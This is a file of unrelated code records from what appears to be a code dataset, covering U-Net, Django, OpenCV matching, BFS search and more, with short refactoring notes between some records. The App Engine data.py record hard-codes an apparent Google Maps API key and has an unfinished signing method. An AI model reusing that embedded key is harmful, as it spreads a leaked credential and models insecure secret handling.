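parser.add_argument('--case', choices=['upper', 'lower'], default='lower')
args = parser.parse_args()
out = args.string * args.num
print(out.upper() if args.case == 'upper' else out.lower())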
+{"seq_id":"168869758","text":"# 1. Generating dataset from file\nimport os\n'''\nExpected dataset example:\n{\n    'Jane': {\n        '10.11.2018': {\n            'apple': {\n                'quantity':1,\n                'price': 4.5\n            } #, ...\n        } #,...\n    } #,...\n}\n'''\n# Method 1. Column-wise read\n'''\nTemporary dataset example: {'Jane': [['10.11.2018', 'apple', '1', '4.5']] }\n'''\ndef convert_2_dict(lst):\n    '''\n    Args:\n        lst (list): list of lists for a current column sub-dictionary\n    '''\n    if len(lst[0]) == 2:\n        return {\n            'quantity': lst[0][0],\n            'price': lst[0][1]\n        }\n    dct = {}\n    for sublst in lst:\n        key = sublst[0]\n        if key not in dct:\n            dct[key] = []\n        dct[key].append(sublst[1:])\n    for key in dct:\n        dct[key] = convert_2_dict(dct[key])\n    return dct\nfile = os.path.join(\"../data/task1.csv\")\nwith open(file, encoding='utf-8') as f:\n    f.readline()\n    file = [[el.strip() for el in line.split(',')] for line in f]\n    result = convert_2_dict(file)\n\nprint(result)\n\n\n# Method 2. Row-wise read\ndef add_to_dict(dct, lst):\n    '''\n    Args:\n        dct (dict): (sub)dictionary that is currently updated\n        lst (list): list of items in a currently processed row\n    '''\n    if len(lst) == 3:\n        dct[lst[0]] = {\n            'quantity': lst[1],\n            'price': lst[2]\n        }\n        return dct\n    key = lst[0]\n    if key not in dct:\n        dct[key] = {}\n    add_to_dict(dct[key], lst[1:])\n    return dct\n\ndef convert_str(s):\n    return list(map(str.strip, s.split(',')))\n\nfrom functools import reduce\nfile = os.path.join(\"../data/task1.csv\")\nwith open(file, encoding='utf-8') as f:\n    f.readline()\n    result = reduce(add_to_dict, map(convert_str, f), {})\n\nprint(result)\n\n\n# 2. Extracting data from dataset\nres = set()\n\nfor name, val in result.items():\n    for date, val2 in val.items():\n        res = res.union(set(val2.keys()))\nfor name in result:\n    client_products = set()\n    for date in result[name]:\n        client_products = client_products.union(set(result[name][date].keys()))\n    res = res.intersection(client_products)\n\nprint(res)\n\n\n# 3. Extracting and plotting data series\napples = {}\n\nfor _, dates in result.items():\n    for date, products in dates.items():\n        for prod, chars in products.items():\n            if prod == 'apple':\n                apples[date] = chars['price']\n# this can also be written as\n# apples = {\n#     date: chars['price']\n#     for _, dates in result.items()\n#     for date, products in dates.items()\n#     for prod, chars in products.items()\n#     if prod == 'apple'\n# }\n\nprint(apples)\n\nimport plotly.offline as pl\nimport plotly.graph_objs as go\n\nxs = sorted(list(apples.keys()))\nys = [apples[key] for key in xs]\n\npl.plot([go.Scatter(x=xs,y=ys)])\n# same as\n#\n# pl.plot({\n#     'data': [go.Scatter(x=xs,y=ys)]\n# })\n#\n# or even\n#\n# series1 = go.Scatter(x=xs,y=ys)\n# options = {\n#     'data': [series1]\n# }\n# pl.plot(options)\n","sub_path":"Dataset_tasks/dataset_example.py","file_name":"dataset_example.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
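Both methods in the dataset_example.py record above build the three-level dict with explicit key checks or recursion; dict.setdefault expresses the same construction without either. A sketch over the same row shape (name, date, product, quantity, price); the sample row is hypothetical:

rows = [['Jane', '10.11.2018', 'apple', '1', '4.5']]  # hypothetical parsed CSV row

result = {}
for name, date, product, quantity, price in rows:
    # setdefault returns the existing sub-dict, or inserts an empty one and returns it
    result.setdefault(name, {}).setdefault(date, {})[product] = {
        'quantity': quantity,
        'price': price,
    }

print(result['Jane']['10.11.2018']['apple'])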
+{"seq_id":"515019920","text":"import torch\nimport torch.nn as nn\n\nimport CONST\n\n\n#double 3x3 convolution\ndef dual_conv(in_channel, out_channel):\n    conv = nn.Sequential(\n        nn.Conv2d(in_channel, out_channel, kernel_size=3, padding=(1, 1)),\n        nn.ReLU(inplace= True),\n        nn.Conv2d(out_channel, out_channel, kernel_size=3, padding=(1, 1)),\n        nn.ReLU(inplace= True),\n    )\n    return conv\n\n\nclass Unet(nn.Module):\n    def __init__(self):\n        super(Unet, self).__init__()\n\n        # Left side (contracting path)\n        self.dwn_conv1 = dual_conv(3, 64)\n        self.dwn_conv2 = dual_conv(64, 128)\n        self.dwn_conv3 = dual_conv(128, 256)\n        self.dwn_conv4 = dual_conv(256, 512)\n        self.dwn_conv5 = dual_conv(512, 1024)\n        self.maxpool = nn.MaxPool2d(kernel_size=2, stride=2, padding=(0, 0))\n\n        #Right side (expansion path)\n        #transpose convolution is used, shown as green arrow in architecture image\n        self.trans1 = nn.ConvTranspose2d(1024, 512, kernel_size=2, stride=2, padding=(0, 0))\n        self.up_conv1 = dual_conv(1024, 512)\n        self.trans2 = nn.ConvTranspose2d(512, 256, kernel_size=2, stride=2, padding=(0, 0))\n        self.up_conv2 = dual_conv(512, 256)\n        self.trans3 = nn.ConvTranspose2d(256, 128, kernel_size=2, stride=2, padding=(0, 0))\n        self.up_conv3 = dual_conv(256, 128)\n        self.trans4 = nn.ConvTranspose2d(128, 64, kernel_size=2, stride=2, padding=(0, 0))\n        self.up_conv4 = dual_conv(128, 64)\n\n        #output layer (x carries 64 channels at this point)\n        self.out = nn.Conv2d(64, 2, kernel_size=1)\n\n    def forward(self, image):\n\n        #forward pass for Left side\n        x1 = self.dwn_conv1(image)\n        x2 = self.maxpool(x1)\n        x3 = self.dwn_conv2(x2)\n        x4 = self.maxpool(x3)\n        x5 = self.dwn_conv3(x4)\n        x6 = self.maxpool(x5)\n        x7 = self.dwn_conv4(x6)\n        x8 = self.maxpool(x7)\n        x9 = self.dwn_conv5(x8)\n\n        #forward pass for Right side\n        x = self.trans1(x9)\n        y = x7\n        x = self.up_conv1(torch.cat([x,y], 1))\n\n        x = self.trans2(x)\n        y = x5\n        x = self.up_conv2(torch.cat([x,y], 1))\n\n        x = self.trans3(x)\n        y = x3\n        x = self.up_conv3(torch.cat([x,y], 1))\n\n        x = self.trans4(x)\n        y = x1\n        x = self.up_conv4(torch.cat([x,y], 1))\n\n        x = self.out(x)\n\n        return x\n\n\nif __name__ == '__main__':\n    # dwn_conv1 expects 3 input channels, so the test image must have 3 channels\n    image = torch.rand((1, 3, CONST.HEIGHT, CONST.WIDTH))\n    model = Unet()\n    model_output = model(image)\n\n    print(model_output.shape)\n\n    assert list(model_output.shape) == [1, 2, CONST.HEIGHT, CONST.WIDTH]","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
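The Unet in the record above writes out each contracting stage by hand; because the channel progression is regular (3 -> 64 -> ... -> 1024), the same encoder can be generated in a loop with nn.ModuleList, which keeps every block registered for parameter tracking. An illustrative sketch of the pattern, not a drop-in replacement for the class above (the 64x64 test size is an assumption chosen to be divisible by 16):

import torch
import torch.nn as nn

channels = [3, 64, 128, 256, 512, 1024]
down_convs = nn.ModuleList([
    nn.Sequential(
        nn.Conv2d(c_in, c_out, kernel_size=3, padding=1), nn.ReLU(inplace=True),
        nn.Conv2d(c_out, c_out, kernel_size=3, padding=1), nn.ReLU(inplace=True),
    )
    for c_in, c_out in zip(channels, channels[1:])
])
pool = nn.MaxPool2d(kernel_size=2, stride=2)

x = torch.rand(1, 3, 64, 64)
skips = []
for i, block in enumerate(down_convs):
    x = block(x)
    if i < len(down_convs) - 1:
        skips.append(x)   # saved for torch.cat on the expanding path
        x = pool(x)

print(x.shape)  # torch.Size([1, 1024, 4, 4])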
+{"seq_id":"399030387","text":"def palindrome(num_list):\n    revers_list = []\n    for i_num in range(len(num_list) - 1, -1, -1):\n        revers_list.append(num_list[i_num])\n    if num_list == revers_list:\n        return True\n    else:\n        return False\n\n\nnums = int(input('Number of values: '))\nall_num = []\nnew_num = []\nanswer = []\n\nfor _ in range(nums):\n    num = int(input('Value: '))\n    all_num.append(num)\n\nfor i_nums in range(0, len(all_num)):\n    for j_num in range(i_nums, len(all_num)):\n        new_num.append(all_num[j_num])\n    if palindrome(new_num):\n        for i_answer in range(0, i_nums):\n            answer.append(all_num[i_answer])\n        answer.reverse()\n        break\n    new_num = []\n\nprint('Sequence: ', all_num)\nprint('Number of values to append: ', len(answer))\nprint('The values themselves: ', answer)\n","sub_path":"Module16/10_simmetrical_seq/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"405786134","text":"import numpy as np\n\n\nclass MatrixManipulation:\n    def __init__(self, type):\n        self.type = type\n\n    def type_matrix(self, values):\n        if self.type == \"LOWER_DIAG_ROW\":\n            return self.fill_matrix_lower(values)\n        elif self.type == \"UPPER_DIAG_ROW\":\n            return self.fill_matrix(values)\n        else:\n            print(\"This type is not supported\")\n\n    def fill_matrix(self, values):\n        elements = self.return_elements(values)\n        matrix = np.zeros((elements, elements))\n        iu1 = np.triu_indices(elements, 1)\n        matrix[iu1] = values\n        iu2 = np.tril_indices(elements, -1)\n        matrix[iu2] = values\n\n        return matrix\n\n    def fill_matrix_lower(self, values):\n        elements = self.return_elements(values) - 1\n        matrix = np.zeros((elements, elements))\n        iu1 = np.triu_indices(elements)\n        matrix[iu1] = values\n        iu2 = np.tril_indices(elements)\n        matrix[iu2] = values\n\n        return matrix\n\n    def return_elements(self, values: list) -> int:\n        size = len(values)\n        i = 1\n        total = 0\n        while total < size:\n            total += i\n            i += 1\n\n        return i\n","sub_path":"utils/Matrix_Manipulation.py","file_name":"Matrix_Manipulation.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"566578182","text":"import platform\r\nimport datetime\r\nimport os\r\n\r\n\"\"\"\r\nThe Logger class will create a log file if it does not\r\nalready exist. The log file provides timestamps for\r\nwhen a file is parsed by the main program.\r\n\r\n@authors: Tomas Perez, Lauren Nelson, Roberto Rodriguez\r\n\"\"\"\r\n\r\n\r\nclass Logger:\r\n    def __init__(self, logfile):\r\n        self.logfile = logfile\r\n        # Verify that the log file is not a directory.\r\n        if os.path.isdir(logfile):\r\n            raise Exception(\"The path for the log file must be a file, not a directory.\")\r\n        # Verify the parent directory exists (the file itself need not exist).\r\n        folder = os.path.dirname(logfile)\r\n        if folder and not os.path.isdir(folder):\r\n            raise Exception(\"The folder for the log file does not exist.\")\r\n\r\n    def log(self, msg):\r\n        machine = platform.node()\r\n        now = datetime.datetime.now()\r\n        date = \"{0}_{1}_{2} {3}:{4}:{5}\".format(\r\n            now.year, now.month, now.day,\r\n            now.hour, now.minute, now.second)\r\n        text = \"{0}/{1}: {2}\".format(machine, date, msg)\r\n        print(\"  log=\" + text)\r\n        # Append line to log file\r\n        with open(self.logfile, 'a+') as file_out:\r\n            file_out.write(\"{0}\\n\".format(text))\r\n","sub_path":"EGR-400-Project1_Personal/FileAPI/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
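The logger.py record above formats timestamps and appends to the file by hand; Python's built-in logging module provides the same behaviour (timestamped, append-mode file output plus the machine name) with less code. A minimal sketch; 'log.txt' is a placeholder path, and basicConfig opens the file in append mode by default:

import logging
import platform

logging.basicConfig(
    filename='log.txt',  # placeholder path; created on first use
    format='%(asctime)s ' + platform.node() + ' %(levelname)s: %(message)s',
    level=logging.INFO,
)
logging.info('parsed file successfully')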
+{"seq_id":"318855425","text":"import os\nimport json\n\n\ntaxonomy_file = 'taxonomy/ott3.2/taxonomy.tsv'\n\nis_header = True\ngenus = set()\n\nwith open(taxonomy_file, 'r') as f:\n    for row in f:\n        row = row.strip()\n        items = [s.strip() for s in row.split('|')]\n        if is_header:\n            columns = items\n            is_header = False\n        else:\n            d = dict(zip(columns, items))\n            if d['rank'] == 'genus':\n                genus.add(d['name'])\n\nmimicry_files = sorted([s for s in os.listdir('mimicry') if s.endswith('.json')])\n\nfor mf in mimicry_files:\n    path = os.path.join('mimicry', mf)\n\n    print(path)\n\n    with open(path, 'r') as f:\n        data = json.loads(f.read())\n\n    if not data['mimetic']['genus'] in genus:\n        print('mimetic genus not found:', data['mimetic']['genus'])\n\n    for model in data['model']:\n        if not model['genus'] in genus:\n            print('model genus not found:', model['genus'])\n","sub_path":"1_check_mimicry.py","file_name":"1_check_mimicry.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"101497778","text":"from django.shortcuts import render, get_object_or_404\n\nfrom .models import Producto, Categoria\nfrom ecomerce.cart.forms import CartAddProductForm\n# Create your views here.\n\ndef producto_lista(request, category_slug=None):\n    categoria = None\n    categorias = Categoria.objects.all()\n    productos = Producto.objects.filter(disponible=True)\n    if category_slug:\n        categoria = get_object_or_404(Categoria, slug=category_slug)\n        productos = productos.filter(categoria=categoria)\n    return render(request,\n                  'shop/producto/list.html',\n                  { 'categoria':categoria,\n                    'categorias':categorias,\n                    'productos':productos\n\n                  })\n\ndef producto_detalle(request, id, slug):\n    producto = get_object_or_404(Producto,\n                                 id=id,\n                                 slug=slug,\n                                 disponible=True)\n    cart_product_form = CartAddProductForm()\n    return render(request, 'shop/producto/detalle.html', {'producto':producto,\n                                                          'cart_product_form':cart_product_form})","sub_path":"ecomerce/shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"136948497","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef correspondence_problem(factor):\n    img1 = cv2.imread('book.jpg',cv2.IMREAD_GRAYSCALE)\n    img2 = cv2.imread('image2.jpeg',cv2.IMREAD_GRAYSCALE)\n\n    ## resize\n    img1 = cv2.resize(img1, dsize=(480, 640), interpolation=cv2.INTER_AREA)\n    img2 = cv2.resize(img2, dsize=(480, 640), interpolation=cv2.INTER_AREA)\n\n\n    # create the SIFT detector\n    sift = cv2.xfeatures2d.SIFT_create()\n\n    # detect SIFT keypoints\n    kp1 = sift.detect(img1, None)\n    kp2 = sift.detect(img2, None)\n\n    # compute SIFT descriptors\n    kp1, des1 = sift.compute(img1, kp1)\n    kp2, des2 = sift.compute(img2, kp2)\n\n\n    # FLANN matching\n    FlANN_INDEX_KDTREE = 0\n    index_params = dict(algorithm=FlANN_INDEX_KDTREE, trees=5)\n    search_params = dict(checks=50)\n\n    flann = cv2.FlannBasedMatcher(index_params, search_params)\n    matches = flann.knnMatch(des1, des2, k=2)\n\n    res = None\n    good = []\n    for m, n in matches:\n        if m.distance < factor * n.distance:\n            good.append(m)\n    res = cv2.drawMatches(img1, kp1, img2, kp2, good, res, flags=2)\n\n    # display the keypoint images\n    img1_2, img2_2 = None, None\n    img1_2 = cv2.drawKeypoints(img1, kp1, img1_2)\n    img2_2 = cv2.drawKeypoints(img2, kp2, img2_2,\n                               flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n    #\n    # cv2.imshow('SIFT1 detect', img1_2)\n    # cv2.imshow('SIFT2 detect', img2_2)\n    # cv2.imshow('Feature Matching', res)\n\n\n    # homography to find objects\n    MIN_MATCH_COUNT = 30\n    print(len(good))\n    if len(good) > MIN_MATCH_COUNT:\n        src_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n        dst_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n\n        M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\n        # We have seen that there can be some possible errors while matching which may affect the result.\n        # To solve this problem, algorithm uses RANSAC or LEAST_MEDIAN (which can be decided by the flags)\n        matchesMask = mask.ravel().tolist()\n        # ravel(): return a contiguous flattened array, tolist(): convert the array to a list.\n\n        h, w = img1.shape[:2]\n        pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1, 1, 2)\n        dst = cv2.perspectiveTransform(pts, M)\n        dst +=np.float32([w,0])\n        # draw the projected outline on the match image (drawing on the point array itself was a bug)\n        res = cv2.polylines(res, [np.int32(dst)], True, 255, 2, cv2.LINE_AA)\n        # target image to draw on; each pts[i] is an array of polygon points; True closes the polygon (last point joined to the first)\n    else:\n        print(\"not enough matches\", len(good))\n        matchesMask = None\n\n\n    draw_params = dict(matchColor=(0, 255, 0),\n                       singlePointColor=(255, 0, 0),\n                       matchesMask=matchesMask, flags=0)\n    # img4 = cv2.drawMatches(img1, kp1, img2, kp2, good, None, **draw_params)\n\n    # Draw bounding box in Red\n    img4 = cv2.polylines(res, [np.int32(dst)], True, (255, 0, 0), 2, cv2.LINE_AA)\n    cv2.imshow('drawMatches',img4)\n\n    cv2.waitKey(0)\n    cv2.destroyAllWindows()\n\ncorrespondence_problem(0.8)\n","sub_path":"1주차코드/이동훈/1주차실습_이동훈.py","file_name":"1주차실습_이동훈.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"346934592","text":"#!/usr/bin/env python\n#\n# Copyright 2018 Paul Harwood\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport datetime, 
urllib, json\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext.ndb import msgprop\nfrom protorpc import messages\nfrom google.appengine.api import users\nfrom google.appengine.api import app_identity\nfrom google.appengine.api import urlfetch\nfrom datetime import datetime\nimport logging\nimport googlemaps\nfrom requests_toolbelt.adapters import appengine\nappengine.monkeypatch()\n\n\nGUN_TYPES = (\"Cast Iron\", \"Wrought Iron\", \"Bronze\", \"Not Known\")\n\nRECORD_QUALITIES = ('bronze', \"silver\", \"gold\")\n\nclass BNG(ndb.Model):\n eastings = ndb.IntegerProperty()\n northings = ndb.IntegerProperty()\n\n def convert_to_LL(self):\n url = 'http://www.bgs.ac.uk/data/webservices/CoordConvert_LL_BNG.cfc?method=BNGtoLatLng&easting=' + str(self.eastings) + \"&northing=\" + str(self.northings)\n return self.BGS_api(url)\n\n @classmethod\n def convert_from_LL(self, lat, lon):\n url = \"http://www.bgs.ac.uk/data/webservices/CoordConvert_LL_BNG.cfc?method=LatLongToBNG&lat=\" + lat + \"&lon=\" + lon\n return BNG.BGS_api(url)\n\n @classmethod\n def BGS_api(self,url):\n try:\n result = urlfetch.fetch(\n url= url,\n method='GET',\n headers={\"content-type\": \"application/json\"},\n deadline=2000)\n if result.status_code == 200:\n try:\n payload = result.content\n response = json.loads(payload)\n return response\n except:\n raise Exception('ParseError' + payload)\n else:\n raise Exception('ApiError' + str(result.status_code))\n except Exception as e:\n logging.error(str(e))\n return\n\n\nclass Gun(ndb.Model):\n class Types(messages.Enum):\n CAST = 0\n WROUGHT = 1\n BRONZE = 2\n NOT_KNOWN = 3\n class Quality(messages.Enum):\n GOLD = 2\n SILVER = 1\n BRONZE = 0\n id = ndb.IntegerProperty()\n gunid = ndb.IntegerProperty()\n location = ndb.GeoPtProperty()\n type = ndb.msgprop.EnumProperty(Types)\n quality = ndb.msgprop.EnumProperty(Quality, default=Quality.BRONZE)\n description = ndb.StringProperty()\n name = ndb.StringProperty()\n date = ndb.DateProperty(auto_now = True)\n site = ndb.StringProperty()\n context = ndb.StringProperty()\n collection = ndb.BooleanProperty()\n coll_name = ndb.StringProperty()\n coll_ref = ndb.StringProperty()\n images = ndb.TextProperty(repeated=True)\n markings = ndb.BooleanProperty()\n mark_details = ndb.StringProperty()\n interpretation = ndb.BooleanProperty()\n inter_details = ndb.StringProperty()\n country = ndb.StringProperty(default=\"none\")\n geocode = ndb.JsonProperty()\n\n @classmethod\n def map_data(cls):\n list = cls.query().order(Gun.id).fetch()\n map_data = []\n for gun in list :\n if gun.quality is None:\n gun.quality = Gun.Quality.BRONZE\n\n if gun.images[0] == \"\":\n thumbnail = \"/img/32x32.png\"\n else:\n thumbnail = gun.images[0] + \"=s32\"\n try:\n map_data.append({\n \"anchor_id\" : gun.id,\n \"description\" : gun.description,\n \"latitude\" : gun.location.lat,\n \"longitude\" : gun.location.lon,\n \"anchor_type\" : GUN_TYPES[gun.type.number],\n \"location\" : gun.context,\n \"names\" : gun.name,\n 'filename' : thumbnail,\n 'quality' : RECORD_QUALITIES[gun.quality.number],\n 'nationality': gun.country,\n 'site' : gun.site,\n })\n except Exception as e:\n logging.error(str(e))\n return map_data\n\n @classmethod\n def get_next(cls):\n all = Gun.query().order(-Gun.id).fetch()\n if all :\n return all[0].id + 1\n else:\n return 1\n\n @classmethod\n def get_id(self, id):\n return Gun.query(Gun.id == id).get()\n\ndef to_bool(bool_str):\n \"\"\"Parse the string and return the boolean value encoded or raise an exception\"\"\"\n if 
isinstance(bool_str, basestring) and bool_str:\n if bool_str.lower() in ['true', 't', '1', 'on']: return True\n elif bool_str.lower() in ['false', 'f', '0', 'off']: return False\n else: raise TypeError\n\ndef to_int(int_string):\n try:\n return int(int_string)\n except Exception :\n return 0\n\ndef UserStatus(uri):\n # set up the user context and links for the navbar\n user = users.get_current_user()\n uri = uri.split(\"?\")[0]\n if user:\n url = users.create_logout_url(uri)\n url_linktext = 'Logout'\n else:\n url = users.create_login_url(uri)\n url_linktext = 'Login'\n return {'user': user, 'url': url, 'url_linktext': url_linktext}\n\nclass Auth:\n def __init__(self, scope):\n self.scope = scope\n self.service_name = app_identity.get_application_id()\n return\n\n def get_token(self):\n self.auth_token, _ = app_identity.get_access_token(\n self.scope)\n logging.info(\n 'Using token {} to represent identity {}'.format(\n self.auth_token, app_identity.get_service_account_name()))\n return self.auth_token\n\n def get_signed_url(self, content_name, content_type):\n now = datetime.utcnow()\n delta = datetime.timedelta(hours=3)\n expiry = now + delta\n timestamp = expiry.timestamp()\n signed_string= \"PUT \\n \\n\" + content_type + \"\\n\" + str(timestamp) + \"\\n\" + \"/\" + self.service_name + \"/\" + content_name\n\n def get_url(self):\n return \"https://www.googleapis.com/upload/storage/v1/b/\" + self.service_name + \".appspot.com/o?uploadType=resumable\"\n\n\ndef geolocate(location) :\n gmaps = googlemaps.Client(key='AIzaSyDZcNCn8CzpdFG58rzRxQBORIWPN9LOVYg')\n reverse_geocode_result = gmaps.reverse_geocode((location.lat, location.lon))\n return reverse_geocode_result\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"417279877","text":"import hashlib\n\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.response import Response \nfrom rest_framework import status\n\nclass ETAGMixin(object):\n\t\"\"\"\n\tETAG Mixin adds the ETAG header to list responses which client can use to cach resources, If the client provided\n\tIf-None-Match header and the resource didn't change the server respond with 304 Not Modified. 
\n\t\"\"\"\n\tdef list(self, request, *args, **kwargs):\n\t\tqueryset = self.filter_queryset(self.get_queryset())\n\n\t\tpage = self.paginate_queryset(queryset)\n\t\tif page is not None:\n\t\t\tserializer = self.get_serializer(page, many=True)\n\t\t\treturn self.response_with_etag_or_304(request, serializer, self.get_paginated_response(serializer.data))\n\n\t\tserializer = self.get_serializer(queryset, many=True)\n\t\treturn self.response_with_etag_or_304(request, serializer, Response(serializer.data))\n\n\tdef response_with_etag_or_304 (self, request, serializer, response):\n\t\tetag = hashlib.md5(JSONRenderer().render(serializer.data)).hexdigest()\n\t\tnone_match_header = None\n\t\tif 'HTTP_IF_NONE_MATCH' in request.META:\n\t\t\tnone_match_header = request.META['HTTP_IF_NONE_MATCH']\n\t\telif 'If-None-Match' in request.META:\n\t\t\tnone_match_header = request.META['If-None-Match']\n\n\t\tif none_match_header:\n\t\t\tif etag == none_match_header:\n\t\t\t\tresponse_304 = Response (data= '{}', status = status.HTTP_304_NOT_MODIFIED)\n\t\t\t\treturn response_304\n\t\tresponse['ETAG'] = etag\n\t\treturn response\n","sub_path":"src/products/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"416425452","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 19 15:12:08 2019\n\n@author: emmetlee\nStudentID = 19240024\nPTAI Assignment3\n\"\"\"\nimport sys\nimport json\nimport numpy as np\n\n\"\"\"The solve() function takes an input file and returns a printed solution\"\"\"\ndef solve(grid):\n #Open the json file passed into the solve function\n d = json.load (open(grid))\n\n #Work out the shape and size of the input dictionary\n tmpd = {k: len(v) for k,v in d.items()}\n lengths = [lengthv for lengthv in tmpd.values()]\n \n \"\"\"Print the Output Grids for training inputs\"\"\"\n \n for i in range(lengths[1]):\n for j in range(len(d['train'][0]['input'][i])):\n #Create a new list to input the solution to\n #extend the input grid to create a larger output grid footprint\n output_grid1 = [] \n output_grid1.extend(d['train'][i]['input'][j])\n \n #iterate through the list and output to the solution grid\n for z in range(len(output_grid1)):\n output_grid1.append(output_grid1[2-z])\n #print as a numpy 2D array, rather than list\n print(np.asarray(output_grid1)) \n print(\" \") #Add a blank line between output grids\n\n \"\"\"Print the Output Grids for Evaluation inputs\"\"\"\n \n for i in range(lengths[0]):\n for j in range(len(d['test'][0]['input'][i])):\n #Create a new list to input the solution to\n output_grid2 = []\n output_grid2.extend(d['test'][i]['input'][j])\n \n #iterate through the list and output to the solution grid\n for z in range(len(output_grid2)):\n output_grid2.append(output_grid2[2-z])\n #print as a numpy 2D array, rather than list\n print(np.asarray(output_grid2))\n\n\"\"\"main function will call the solve function and pass in the json\"\"\"\ndef main():\n \"\"\"Call solve() function and pass the json\n Read the first command-line argument (after python script) \n as the input file\"\"\"\n input_grid = sys.argv[1]\n solve(input_grid) #pass the input file to the solve function\n \n\"\"\"Call the main function\"\"\" \nif __name__ == \"__main__\":\n 
main()\n","sub_path":"src/solution_c9e6f938.py","file_name":"solution_c9e6f938.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"158400251","text":"\n#nodes explored\n#path\nfrom collections import deque\ndef check(travel):\n\t# bounds must be tested before indexing: a row equal to dim[0] would raise IndexError,\n\t# and negative rows would silently wrap around to the other side of the grid\n\tif(travel[0] >= 0 and travel[0] < dim[0] and travel[1] >= 0 and travel[1] < dim[1] and vis[travel[0]][travel[1]] == -1):\n\t\tif(grid[travel[0]][travel[1]] == '-' or grid[travel[0]][travel[1]] == '.'):\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\telse:\n\t\treturn False\n\ndef bfs(s,d) :\n\tl = deque()\n\tl.append(s)\n\tvis[s[0]][s[1]] = 0\n\tresult = -1\n\tcount = 0\n\tparent = [[(-1,-1)]*dim[1] for i in range(dim[0])]\n\trow = [-1,0,0,1]\n\tcol = [0,-1,1,0]\n\twhile(len(l) != 0):\n\t\tcurr = l.popleft()\n\t\tcount += 1\n\t\texplored.append(curr)\n\t\tif(curr[0] == d[0] and curr[1] == d[1]) :\n\t\t\tresult = vis[curr[0]][curr[1]]\n\t\t\tbreak\n\t\tfor index in range(4) :\n\t\t\tu,v = curr[0]+row[index] , curr[1]+col[index]\n\n\t\t\tif(check([u,v])):\n\t\t\t\tvis[u][v] = 1 + vis[curr[0]][curr[1]] \n\t\t\t\tl.append([u,v])\n\t\t\t\tparent[u][v] = (curr[0],curr[1])\n\t\t\n\treturn (result,count,parent)\n\n\n\nsource = list(map(int,input().split()))\ndestination = list(map(int,input().split()))\ndim = list(map(int,input().split()))\ngrid = [input() for i in range(dim[0])]\n#print(grid)\nvis = [[-1]*dim[1] for i in range(dim[0])]\nexplored = []\n(result,count,parent) = bfs(source,destination)\ntemp = destination\npath = []\nwhile(parent[temp[0]][temp[1]] != (-1,-1)) :\n\tpath.append((temp[0],temp[1]))\n\ttemp = parent[temp[0]][temp[1]]\npath.append(source)\npath.reverse()\nprint(count)\nfor i in explored :\n\tprint(i[0],i[1])\nprint(result)\nfor i in path:\n\tprint(i[0],i[1])\n","sub_path":"ass3/pacmanbfs.py","file_name":"pacmanbfs.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
